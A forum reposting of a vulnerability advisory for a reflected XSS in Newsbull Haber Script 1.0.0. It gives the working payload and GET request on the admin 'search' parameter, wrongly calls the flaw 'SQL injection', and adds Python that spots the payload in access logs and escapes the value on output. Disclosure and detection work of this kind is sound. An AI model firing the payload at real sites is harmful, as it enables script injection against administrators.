Newsbull Haber Script XSS Vuln.
by Adient - 05-30-2019, 10:55 PM
####################################################################


# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Vicroity 
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

####################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# You can see the vulnerability by using the XSS code as specified in the poc section.
# The proof of the deficit is in the links below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg

####################################################################

# POC - XSS
# Parameters : search
# Attack Pattern : '"--></style></Script><Script>alert(0x007454)</Script>
# GET Request : http://localhost/newsbull/admin/category/records?search='"--></style></Script><Script>alert(0x007454)</Script>

####################################################################
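As an added illustration (not part of the original post or of the Newsbull project), the following Python shows the defender's side of the issue above: a check that spots markup arriving in the `search` parameter of the `/newsbull/admin/category/records` endpoint in web-server access logs, and the output escaping that prevents the reflected value from being rendered as HTML. The log lines are constructed samples; the URL-encoded request is the advisory's own pattern as a browser would send it.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (not from the original post). The second line
# carries the advisory's payload, percent-encoded the way a browser sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2019:10:01:02 +0000] "GET /newsbull/admin/category/records?search=spor HTTP/1.1" 200 5120
10.0.0.5 - - [28/Jan/2019:10:01:09 +0000] "GET /newsbull/admin/category/records?search=%27%22--%3E%3C%2Fstyle%3E%3C%2FScript%3E%3CScript%3Ealert%280x007454%29%3C%2FScript%3E HTTP/1.1" 200 5133
10.0.0.7 - - [28/Jan/2019:10:02:30 +0000] "GET /newsbull/index.php HTTP/1.1" 200 8000
"""

# Request target inside the quoted request line of a common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Fragments that have no business in a plain search term: tag openers/closers,
# inline event handlers, javascript: URLs (case-insensitive, as the payload mixes case).
MARKUP_RE = re.compile(r"<\s*/?\s*(script|style|img|svg|iframe)\b|on\w+\s*=|javascript:", re.I)


def flag_reflected_xss(log_text, path="/newsbull/admin/category/records", param="search"):
    """Return (line_no, decoded_value) for requests whose `param` carries markup."""
    hits = []
    for no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            # parse_qs percent-decodes once; decode again so a double-encoded
            # payload is inspected in the form the application would see.
            decoded = unquote_plus(value)
            if MARKUP_RE.search(decoded):
                hits.append((no, decoded))
    return hits


def render_search_echo(search):
    """Echo the submitted term back into the page with HTML attribute escaping.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the reflected
    value can no longer close the input tag or open a <script> element.
    """
    return '<input name="search" value="%s">' % html.escape(search, quote=True)
```

Running `flag_reflected_xss(SAMPLE_LOG)` reports only the second line, and the decoded value it returns is exactly the attack pattern from the advisory.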